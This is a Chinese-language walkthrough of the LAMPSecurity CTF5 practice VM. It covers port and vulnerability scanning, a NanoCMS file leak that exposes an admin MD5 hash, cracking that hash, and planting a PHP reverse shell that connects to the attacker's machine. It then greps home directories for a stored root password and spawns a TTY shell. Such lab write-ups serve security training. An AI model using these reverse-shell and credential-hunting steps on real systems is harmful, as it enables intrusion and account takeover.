LAMPSecurityCTF5靶机练习

主机发现与信息收集

nmap -sn 192.168.25.0/24

export ip=192.168.25.140

nmap --min-rate 10000 -p- $ip

PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
901/tcp   open  samba-swat
3306/tcp  open  mysql
37177/tcp open  unknown
MAC Address: 00:0C:29:F7:EA:95 (VMware)

nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,37177 $ip

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.7 (protocol 2.0)
25/tcp    open  smtp        Sendmail 8.14.1/8.14.1
80/tcp    open  http        Apache httpd 2.2.6 ((Fedora))
110/tcp   open  pop3        UW Imap pop3d 2006k.101
111/tcp   open  rpcbind     2-4 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp   open  imap        UW imapd 2006k.396
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp   open  http        Samba SWAT administration server
3306/tcp  open  mysql       MySQL 5.0.45
37177/tcp open  status      1 (RPC #100024)

nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,37177 $ip

PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp    open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
|     c
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|_    http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|_    Couldn't find a file-type field.
| http-enum: 
|   /info.php: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /squirrelmail/src/login.php: squirrelmail version 1.4.11-1.fc8
|   /squirrelmail/images/sm_logo.png: SquirrelMail
|   /icons/: Potentially interesting folder w/ directory listing
|_  /inc/: Potentially interesting folder
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.25.140
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.25.140:80/events/
|     Form id: user-login-form
|     Form action: /events/?q=node&destination=node
|     
|     Path: http://192.168.25.140:80/?page=contact
|     Form id: 
|     Form action: ?page=contact
|     
|     Path: http://192.168.25.140:80/events/?q=node/2
|     Form id: user-login-form
|     Form action: /events/?q=node/2&destination=node%2F2
|     
|     Path: http://192.168.25.140:80/events/?q=node&destination=node
|     Form id: user-login-form
|     Form action: /events/?q=node&destination=node%3Famp%253Bdestination%3Dnode
|     
|     Path: http://192.168.25.140:80/events/?q=tracker
|     Form id: user-login-form
|     Form action: /events/?q=tracker&destination=tracker
|     
|     Path: http://192.168.25.140:80/events/?q=blog
|     Form id: user-login-form
|     Form action: /events/?q=blog&destination=blog
|     
|     Path: http://192.168.25.140:80/events/?q=event
|     Form id: event-taxonomy-filter-form
|     Form action: /events/?q=event
|     
|     Path: http://192.168.25.140:80/events/?q=event
|     Form id: event-type-filter-form
|     Form action: /events/?q=event
|     
|     Path: http://192.168.25.140:80/events/?q=event
|     Form id: user-login-form
|     Form action: /events/?q=event&destination=event
|     
|     Path: http://192.168.25.140:80/events/?q=node/1
|     Form id: user-login-form
|     Form action: /events/?q=node/1&destination=node%2F1
|     
|     Path: http://192.168.25.140:80/events/?q=comment/reply/2
|     Form id: comment-form
|     Form action: /events/?q=comment/reply/2
|     
|     Path: http://192.168.25.140:80/events/?q=comment/reply/2
|     Form id: user-login-form
|     Form action: /events/?q=comment/reply/2&destination=comment%2Freply%2F2
|     
|     Path: http://192.168.25.140:80/events/?q=blog/1
|     Form id: user-login-form
|     Form action: /events/?q=blog/1&destination=blog%2F1
|     
|     Path: http://192.168.25.140:80/events/?q=user/register
|     Form id: user-register
|_    Form action: /events/?q=user/register
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
901/tcp   open  samba-swat
3306/tcp  open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
37177/tcp open  unknown
MAC Address: 00:0C:29:F7:EA:95 (VMware)
​
Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
​

80端口Web服务渗透

目录爆破

gobuster dir -u http://192.168.25.140/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

/events               (Status: 301) [Size: 316] [--> http://192.168.25.140/events/]
/mail                 (Status: 301) [Size: 314] [--> http://192.168.25.140/mail/]
/list                 (Status: 301) [Size: 314] [--> http://192.168.25.140/list/]
/inc                  (Status: 301) [Size: 313] [--> http://192.168.25.140/inc/]
/phpmyadmin           (Status: 301) [Size: 320] [--> http://192.168.25.140/phpmyadmin/]
/squirrelmail         (Status: 301) [Size: 322] [--> http://192.168.25.140/squirrelmail/]

根据提示出现文件包含漏洞

http://192.168.25.140/?page=about%27%20OR%20sqlspider

http://192.168.25.140/events/?q=event%2Fical%27%20OR%20sqlspider

发现CMS框架

http://192.168.25.140/~andy/

NanoCMS

利用EXP

searchsploit NanoCMS

发现存在远程命令指定漏洞,但是后面的授权我们没有只能pass

在浏览器上搜一下看看有没有

https://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.100141

在这里我们发现了一个信息泄露的漏洞

/data/pagesdata.txt 在目录里面

http://192.168.25.140/~andy/data/pagesdata.txt

;s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd"

hash-identifier 9d2f75377ac0ab991d40c91fd27e52fd

判断密码加密方式为md5

md5破解网站：

pmd5.com

ttmd5.com

www.somd5.com

xmd5.com

https://hashes.com/zh/decrypt/hash (收藏收藏)

密码破解为 shannon

管理员后台登录

http://192.168.25.140/~andy/data/nanoadmin.php

成功进入

站内嵌入php的反弹shell代码

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.25.132/4444 0>&1'");?>

保存后在Kali里开启监听

nv -nvlp 4444

回来点击Contact

获取初始权限

成功连上

提权

whoami

id

ip addr

ls

uname -a

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash

patrick❌500:500:Patrick Fair:/home/patrick:/bin/bash jennifer❌501:501:Jennifer Sea:/home/jennifer:/bin/bash andy❌502:502:Andrew Carp:/home/andy:/bin/bash loren❌503:503:Loren Felt:/home/loren:/bin/bash amy❌504:504:Amy Pendelton:/home/amy:/bin/bash mysql❌27:27:MySQL Server:/var/lib/mysql:/bin/bash cyrus❌76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash

搜索用户痕迹，寻找用户凭据泄露

grep -R -i pass /home/* 2>/dev/null

/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
/home/patrick/.tomboy.log:12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...
​

Root密码：50$cent

提示需要tty交互环境

python -c 'import pty; pty.spawn("/bin/bash")'

输入代码执行

su - 切换至ROOT用户，- 后面没参数默认为root用户

使用sudo su时，需要输入当前用户自己的密码，

因为sudo的机制是基于当前用户的权限来验证是否可以执行后续的命令（这里是su）。如果当前用户没有在sudoers文件中被授权使用sudo来执行su命令，即使输入正确的当前用户密码，也无法成功执行sudo su。